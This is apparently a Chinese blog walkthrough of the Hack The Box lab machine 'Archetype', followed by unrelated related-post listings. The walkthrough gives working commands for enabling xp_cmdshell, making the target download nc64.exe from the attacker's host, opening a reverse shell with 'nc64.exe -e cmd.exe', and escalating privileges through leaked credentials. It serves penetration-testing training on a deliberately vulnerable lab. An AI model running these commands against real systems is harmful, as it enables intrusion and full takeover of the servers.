TIER 2: Archetype

扫描 nmap

使用 nmap 进行扫描目标 IP,发现目标是 Windows 服务器,开放 SMB 和 SQL Server 服务。

SMB

SMB 之前已经接触过,在 Windows 和 Linux 操作系统上连接 SMB 服务器的方法:

  • windows 上使用:使用资源管理器、cmd 的 net、powershell 的 New-PSDrive 等。
  • linux 上需要借助 smbclient 进行连接,smbclient 属于 samba 的一部分。

Microsoft 官方资料:

我们在 kali 使用 smbclient 时,先使用 -N 和 -L 选项进行匿名登录和列出共享目录。提示使用 smbclient 不明白时,用 man smbclient 查看帮助文档。在 backups 下可以发现一个 prod.dtsConfig 配置文件,通过 get 可以下载这个文件。

使用 cat 查看文件,我们可以发现其中是明文存储账号密码凭证。主机 ARCHETYPE 用户 sql_svc 密码 M3g4c0rp123 凭证。

Microsoft SQL Server

Microsoft SQL Server 是由 Microsoft 开发和管理的关系型数据库管理系统(RDBMS)。SQL Server 使用 TCP/IP 协议进行网络通信,并使用默认的 1433 端口号。但是,端口号可以根据需要进行配置和更改。

通过上面在配置文件中发现的信息,我们通过 impacket 工具进行登录。

  • 项目地址:https://github.com/fortra/impacket
  • 建议使用 Python 创建虚拟环境安装 impacket
  • 我们使用项目 impacket/examples/ 下的 mssqlclient.py 进行连接

使用 python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth 连接,注意 {TARGET_IP} 填写目标 IP 地址。

在登录 MSSQL 我们尝试攻击

SELECT is_srvrolemember('sysadmin'); -- 检查当前用户是否是 sysadmin

确认当前用户是 sysadmin 后,我们可以使用 xp_cmdshell 执行命令

-- 判断是否开启 xp_cmdshell
EXEC xp_cmdshell 'net user'; -- 如果没有,下面是激活 xp_cmdshell 的方法
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

确认激活后,通过 xp_cmdshell "whoami" 尝试。现在我们计划在目标上传 nc64.exe 二进制文件,并在监听端口上执行一个交互式的 cmd.exe 进程。

反弹 shell

我们先下载 nc64.exe 二进制文件:https://github.com/int0x33/nc.exe/blob/master/nc64.exe

注:如果使用 windows 下载可能会提示病毒

  • 下载完成后,我们使用 python3 -m http.server 80 在本地启动一个 HTTP 服务
  • 使用 xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe" 让目标下载 nc64.exe 文件
  • kali 上使用 nc -lvnp 4444 监听 4444 端口
  • 开始反弹 xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.9 4444" 让目标主动连接我们的监听端口

sql_svc 用户的 flag 在 C:\Users\sql_svc\Desktop\ 目录下。

提权

我们借助 winPEAS 工具进行提权,下载地址:https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe

使用步骤相似,同样是使用 Python 的 HTTP 服务,让目标下载。让目标下载后直接 .\winPEASx64.exe 运行即可。

我们可以观察到用户具有 SeImpersonatePrivilege 特权,这也容易受到 Juicy Potato 漏洞利用的影响。然而,我们可以首先检查两个现有的文件,其中可能存在凭据。

由于这是一个普通用户账户和服务账户,值得检查频繁访问的文件或执行的命令。为了做到这一点,我们将读取 PowerShell 历史文件,这相当于 Linux 系统中的 .bash_history 文件。ConsoleHost_history.txt 可以在路径 C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ 目录下。通过分析 PowerShell 历史文件,攻击者可以查找之前执行过的命令、访问过的文件路径以及可能存在的敏感信息和凭据。他们可能会寻找密码、敏感命令、远程连接等活动,以获取对其他系统或账户的进一步访问权限。

最终我们在 ConsoleHost_history.txt 中可以发现管理员密码 MEGACORP_4dm1n!!,之后使用 psexec.py 连接 Administrator 用户即可。flag 在 C:\Users\Administrator\Desktop\ 目录下。

TIER 2: Archetype的更多相关文章

  1. 使用Maven命令行快速创建项目骨架(archetype)

      > mvn archetype:generate 接下来就会输出一些列带索引变化的archetype项可供我们选择,然后提示我们选择一个编号,可以直接回车选择默认的编号(392),然后就跟着 ...

  2. maven archetype二三事

    maven plugin 创建maven archetype 骨架的plugin是 <plugin> <groupId>org.apache.maven.plugins< ...

  3. 使用mvn archetype:generate生产maven工程,响应很慢

    经常到下列时就不往下走了. 解决方案: 1.不使用interactive mode方式,直接指定DarchetypeArtifactId 2.仍使用interactive mode方式,但增加参数 - ...

  4. 在cmd命令行使用Maven Archetype插件 generate命令创建简单的java web项目

    前提: 1.下载apache-maven:https://mirrors.tuna.tsinghua.edu.cn/apache/maven/maven-3/3.3.9/binaries/apache ...

  5. maven archetype生成自定义项目原型(模板)

    maven archetype可以将一个项目做成项目原型,之后只需要以此原型来创建项目,那么初始创建的项目便具有原型项目中的一切配置和代码.通俗讲就是一个项目模板. eclipse中那些快速生成mav ...

  6. Maven使用archetype迅速生成项目骨架

    archetype意思是"原型",相当于项目模板.archetype是maven的一个插件,相当于模板工具包. 一个十分重要的mvn指令:mvn 插件名:目标名maven自带三个内 ...

  7. Maven 添加自定义 archetype

    环境:jdk7 maven3.23 eclipse mars 关于maven是使用插件自带的还是单独下载的,应该都是可以的,但是要注意maven和jdk版本的问题,比如3.2.3版本的maven支持j ...

  8. SSM框架整合首只拦路虎——Eclipse新建Maven Project界面select an archetype 空白

    首先给大家说,本篇博客没有技术价值,纯属个人学习总结,权当给大家添加一乐.事件如有雷同,纯属巧合,莫怪! 前一段时间一直在看<淘淘商城>这个教程,里面讲的是SSM框架的一个电商项目.这不是 ...

  9. maven archetype:generate 命令简化项目模板数量

    在maven里使用 mvn archetype:generate 来创建项目是十分方便的,但有时也不尽然.在网络不好时,从网络上加载 archetype-catalog.xml文件(http://re ...

  10. E-Business Suite 12.2 startCD 50 Install Fails with Fatal Error: TXK Install Service oracle.apps.fnd.txk.config.ProcessStateException: OUI process failed Cannot install Web Tier Utilities

    在rhel7.2上,使用startCD 50安装ebs r12.2的使用,安装到38%的时候就报错,遇到了和以下文章类似的问题: http://www.cnblogs.com/abclife/p/49 ...

随机推荐

  1. RocketMQ事务消息源码解析

    RocketMQ提供了事务消息的功能,采用2PC(两阶段协议)+补偿机制(事务回查)的分布式事务功能,通过这种方式能达到分布式事务的最终一致. 一. 概述 半事务消息:指的是发送至broker但是还没 ...

  2. 探寻Dubbo集群容错机制

    一. timeout 与 retries Dubbo的服务可以通过timeout配置超时时间,防止远程调用失败,该属性的默认值为1000(ms),用户可以在多个地方配置服务的超时时间: 图中涉及的配置 ...

  3. Vue cli之项目执行流程

    整个项目是一个主文件index.html,index.html中会引入src文件夹中的main.js,main.js中会导入顶级单文件组件App.vue,App.vue中会通过组件嵌套或者路由来引用其 ...

  4. PaddleOCR在 windows下的webAPI部署方案

    很多小伙伴在使用OCR时都希望能过采用API的方式调用,这样就可以跨端跨平台了.本文将介绍一种基于python的PaddleOCR识方案.喜欢的可以关注公众号,获取更多内容. # 一. windows ...

  5. 基于pulp的线性优化问题:微电网日前优化调度(复现)

    摘录来源:(71条消息) 微电网日前优化调度入门:求解一道数学建模题_我不是玉的博客-CSDN博客 学习记录与复现 问题描述 问题出自第十届"中国电机工程学会杯"全国大学生电工数学 ...

  6. nginx37条优化

    nginx优化: 1. cpu:核心配置 方法1: worker_processes auto; 自动调用[推荐] 方法2: worker_processes 4; 手工配置 检查CPU核心:yum ...

  7. python脚本将ascii码形式的文件转换为真正的二进制文件

    1.通过tcpdump在越狱手机上面抓取所有包,包含环路包 将手机通过USB线连接电脑,并将其映射到本地端口,启动抓包 rvictl -s bb44203ca128c7b13bfc66fa34f6c1 ...

  8. 适用于linux的bilibiliB站直播间弹幕爬虫脚本

    适用于linux的bilibiliB站直播间弹幕爬虫脚本,命令行运行之,输入到命令行,部分内容参考自网络,代码底部可见原始代码出处 BUFF:然而,经测试,每次爬只能读取10条弹幕记录,这就使得在(s ...

  9. makedown快速入门

    Makedown学习 Makedown 作为一个强大文本编辑语言,学习并熟悉应用是写好一篇优秀博客的基础 那么接下来我将介绍makedown语言最常用的几个语法 标题 +"space&quo ...

  10. Python依据遥感影像的分幅筛选出对应的栅格文件

      本文介绍基于Python语言,结合已知研究区域中所覆盖的全部遥感影像的分幅条带号,从大量的遥感影像文件中筛选落在这一研究区域中的遥感影像文件的方法.   首先,先来明确一下本文所需实现的需求.现已 ...